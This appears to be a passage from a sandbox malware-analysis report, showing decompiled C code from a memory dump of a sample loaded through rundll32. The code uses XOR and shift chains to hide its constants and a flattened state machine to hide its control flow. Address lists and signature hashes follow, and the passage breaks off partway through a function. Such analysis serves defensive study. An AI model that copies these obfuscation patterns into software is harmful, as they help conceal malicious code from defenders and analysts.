				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E002D8519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E002D8519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E002D16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E002DD25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E002D2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E002D8F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E002C42C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E002C7FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E002CDF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E002C7FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}









































































                                                                                                                                    0x002cd6e2
                                                                                                                                    0x002cd6eb
                                                                                                                                    0x002cd6f2
                                                                                                                                    0x002cd6f9
                                                                                                                                    0x002cd700
                                                                                                                                    0x002cd707
                                                                                                                                    0x002cd709
                                                                                                                                    0x002cd70e
                                                                                                                                    0x002cd719
                                                                                                                                    0x002cd71c
                                                                                                                                    0x002cd729
                                                                                                                                    0x002cd734
                                                                                                                                    0x002cd736
                                                                                                                                    0x002cd73e
                                                                                                                                    0x002cd740
                                                                                                                                    0x002cd748
                                                                                                                                    0x002cd74d
                                                                                                                                    0x002cd755
                                                                                                                                    0x002cd75d
                                                                                                                                    0x002cd76b
                                                                                                                                    0x002cd770
                                                                                                                                    0x002cd776
                                                                                                                                    0x002cd77e
                                                                                                                                    0x002cd786
                                                                                                                                    0x002cd78e
                                                                                                                                    0x002cd796
                                                                                                                                    0x002cd79b
                                                                                                                                    0x002cd7a0
                                                                                                                                    0x002cd7a8
                                                                                                                                    0x002cd7b0
                                                                                                                                    0x002cd7bb
                                                                                                                                    0x002cd7c6
                                                                                                                                    0x002cd7d1
                                                                                                                                    0x002cd7e3
                                                                                                                                    0x002cd7e8
                                                                                                                                    0x002cd7f1
                                                                                                                                    0x002cd7fc
                                                                                                                                    0x002cd809
                                                                                                                                    0x002cd80a
                                                                                                                                    0x002cd814
                                                                                                                                    0x002cd81d
                                                                                                                                    0x002cd821
                                                                                                                                    0x002cd829
                                                                                                                                    0x002cd831
                                                                                                                                    0x002cd836
                                                                                                                                    0x002cd83e
                                                                                                                                    0x002cd846
                                                                                                                                    0x002cd851
                                                                                                                                    0x002cd859
                                                                                                                                    0x002cd864
                                                                                                                                    0x002cd86c
                                                                                                                                    0x002cd874
                                                                                                                                    0x002cd879
                                                                                                                                    0x002cd881
                                                                                                                                    0x002cd889
                                                                                                                                    0x002cd891
                                                                                                                                    0x002cd899
                                                                                                                                    0x002cd8a1
                                                                                                                                    0x002cd8a9
                                                                                                                                    0x002cd8b1
                                                                                                                                    0x002cd8b9
                                                                                                                                    0x002cd8c1
                                                                                                                                    0x002cd8cb
                                                                                                                                    0x002cd8d9
                                                                                                                                    0x002cd8de
                                                                                                                                    0x002cd8e7
                                                                                                                                    0x002cd8f2
                                                                                                                                    0x002cd8fa
                                                                                                                                    0x002cd902
                                                                                                                                    0x002cd907
                                                                                                                                    0x002cd90c
                                                                                                                                    0x002cd914
                                                                                                                                    0x002cd91c
                                                                                                                                    0x002cd921
                                                                                                                                    0x002cd926
                                                                                                                                    0x002cd92e
                                                                                                                                    0x002cd936
                                                                                                                                    0x002cd93e
                                                                                                                                    0x002cd946
                                                                                                                                    0x002cd952
                                                                                                                                    0x002cd957
                                                                                                                                    0x002cd95d
                                                                                                                                    0x002cd965
                                                                                                                                    0x002cd970
                                                                                                                                    0x002cd978
                                                                                                                                    0x002cd983
                                                                                                                                    0x002cd98e
                                                                                                                                    0x002cd999
                                                                                                                                    0x002cd9a4
                                                                                                                                    0x002cd9b6
                                                                                                                                    0x002cd9bb
                                                                                                                                    0x002cd9c4
                                                                                                                                    0x002cd9cf
                                                                                                                                    0x002cd9da
                                                                                                                                    0x002cd9e5
                                                                                                                                    0x002cd9f0
                                                                                                                                    0x002cd9f8
                                                                                                                                    0x002cda00
                                                                                                                                    0x002cda08
                                                                                                                                    0x002cda1a
                                                                                                                                    0x002cda1f
                                                                                                                                    0x002cda28
                                                                                                                                    0x002cda33
                                                                                                                                    0x002cda3b
                                                                                                                                    0x002cda43
                                                                                                                                    0x002cda4b
                                                                                                                                    0x002cda53
                                                                                                                                    0x002cda5b
                                                                                                                                    0x002cda60
                                                                                                                                    0x002cda68
                                                                                                                                    0x002cda73
                                                                                                                                    0x002cda7b
                                                                                                                                    0x002cda86
                                                                                                                                    0x002cda93
                                                                                                                                    0x002cda94
                                                                                                                                    0x002cda9e
                                                                                                                                    0x002cdaa2
                                                                                                                                    0x002cdaaa
                                                                                                                                    0x002cdab5
                                                                                                                                    0x002cdabd
                                                                                                                                    0x002cdac8
                                                                                                                                    0x002cdad0
                                                                                                                                    0x002cdada
                                                                                                                                    0x002cdadf
                                                                                                                                    0x002cdae7
                                                                                                                                    0x002cdaef
                                                                                                                                    0x002cdb03
                                                                                                                                    0x002cdb08
                                                                                                                                    0x002cdb0f
                                                                                                                                    0x002cdb16
                                                                                                                                    0x002cdb21
                                                                                                                                    0x002cdb2c
                                                                                                                                    0x002cdb34
                                                                                                                                    0x002cdb3f
                                                                                                                                    0x002cdb47
                                                                                                                                    0x002cdb52
                                                                                                                                    0x002cdb57
                                                                                                                                    0x002cdb5b
                                                                                                                                    0x002cdb63
                                                                                                                                    0x002cdb6b
                                                                                                                                    0x002cdb76
                                                                                                                                    0x002cdb81
                                                                                                                                    0x002cdb8c
                                                                                                                                    0x002cdb97
                                                                                                                                    0x002cdb9f
                                                                                                                                    0x002cdbaa
                                                                                                                                    0x002cdbb2
                                                                                                                                    0x002cdbb7
                                                                                                                                    0x002cdbbc
                                                                                                                                    0x002cdbc4
                                                                                                                                    0x002cdbcc
                                                                                                                                    0x002cdbd4
                                                                                                                                    0x002cdbdc
                                                                                                                                    0x002cdbe4
                                                                                                                                    0x002cdbec
                                                                                                                                    0x002cdbf4
                                                                                                                                    0x002cdbf9
                                                                                                                                    0x002cdbfe
                                                                                                                                    0x002cdc02
                                                                                                                                    0x002cdc0a
                                                                                                                                    0x002cdc12
                                                                                                                                    0x002cdc1a
                                                                                                                                    0x002cdc22
                                                                                                                                    0x002cdc2a
                                                                                                                                    0x002cdc32
                                                                                                                                    0x002cdc3a
                                                                                                                                    0x002cdc42
                                                                                                                                    0x002cdc4a
                                                                                                                                    0x002cdc52
                                                                                                                                    0x002cdc5a
                                                                                                                                    0x002cdc65
                                                                                                                                    0x002cdc70
                                                                                                                                    0x002cdc7b
                                                                                                                                    0x002cdc89
                                                                                                                                    0x002cdc91
                                                                                                                                    0x002cdc95
                                                                                                                                    0x002cdc9a
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcb6
                                                                                                                                    0x002cdcb6
                                                                                                                                    0x002cde66
                                                                                                                                    0x002cde6c
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcbc
                                                                                                                                    0x002cdcc2
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf63
                                                                                                                                    0x002cdcce
                                                                                                                                    0x002cde01
                                                                                                                                    0x002cde05
                                                                                                                                    0x002cde0a
                                                                                                                                    0x002cde0f
                                                                                                                                    0x002cde52
                                                                                                                                    0x002cde52
                                                                                                                                    0x002cde57
                                                                                                                                    0x002cde57
                                                                                                                                    0x002cde11
                                                                                                                                    0x002cde1f
                                                                                                                                    0x002cde27
                                                                                                                                    0x002cde39
                                                                                                                                    0x002cde3d
                                                                                                                                    0x002cde41
                                                                                                                                    0x002cde41
                                                                                                                                    0x002cde44
                                                                                                                                    0x002cde48
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcd4
                                                                                                                                    0x002cdcd6
                                                                                                                                    0x002cdd6a
                                                                                                                                    0x002cdd91
                                                                                                                                    0x002cdd9b
                                                                                                                                    0x002cdda0
                                                                                                                                    0x002cdf40
                                                                                                                                    0x002cdf40
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcd8
                                                                                                                                    0x002cdcde
                                                                                                                                    0x002cdd31
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdce0
                                                                                                                                    0x002cdce6
                                                                                                                                    0x002cdf45
                                                                                                                                    0x002cdf4b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf4d
                                                                                                                                    0x002cdcec
                                                                                                                                    0x002cdd14
                                                                                                                                    0x002cdd16
                                                                                                                                    0x002cdd1b
                                                                                                                                    0x002cdd24
                                                                                                                                    0x002cdd29
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdce6
                                                                                                                                    0x002cdcde
                                                                                                                                    0x002cdcd6
                                                                                                                                    0x002cdcce
                                                                                                                                    0x002cdf6e
                                                                                                                                    0x002cdf6e
                                                                                                                                    0x002cde73
                                                                                                                                    0x002cde79
                                                                                                                                    0x002cdf22
                                                                                                                                    0x002cdf23
                                                                                                                                    0x002cdf24
                                                                                                                                    0x002cdf29
                                                                                                                                    0x002cdf2f
                                                                                                                                    0x002cdf3b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf31
                                                                                                                                    0x002cdf31
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf31
                                                                                                                                    0x002cde7f
                                                                                                                                    0x002cde85
                                                                                                                                    0x002cdef6
                                                                                                                                    0x002cdefb
                                                                                                                                    0x002cdf03
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde87
                                                                                                                                    0x002cde87
                                                                                                                                    0x002cde8e
                                                                                                                                    0x002cdee9
                                                                                                                                    0x002cdeee
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde90
                                                                                                                                    0x002cde96
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde9c
                                                                                                                                    0x002cdeb3
                                                                                                                                    0x002cdeb4
                                                                                                                                    0x002cdeb5
                                                                                                                                    0x002cdeba
                                                                                                                                    0x002cdec0
                                                                                                                                    0x002cdec6
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdec6
                                                                                                                                    0x002cdec0
                                                                                                                                    0x002cde96
                                                                                                                                    0x002cde8e
                                                                                                                                    0x002cde85
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde79
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdca6

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                                    • API String ID: 0-652707834
                                                                                                                                    • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                    • Instruction ID: 2cdbd1558b0416c72f4dd5710d553ae82d61a043771145fd5604f83492edcf4a
                                                                                                                                    • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                    • Instruction Fuzzy Hash: 5212317251C3809FD368DF25C88AB5BBBE2BBC4344F108A2DE5C986260D7B19959CF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C81B7 Relevance: 9.1, Strings: 7, Instructions: 349COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E002C81B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
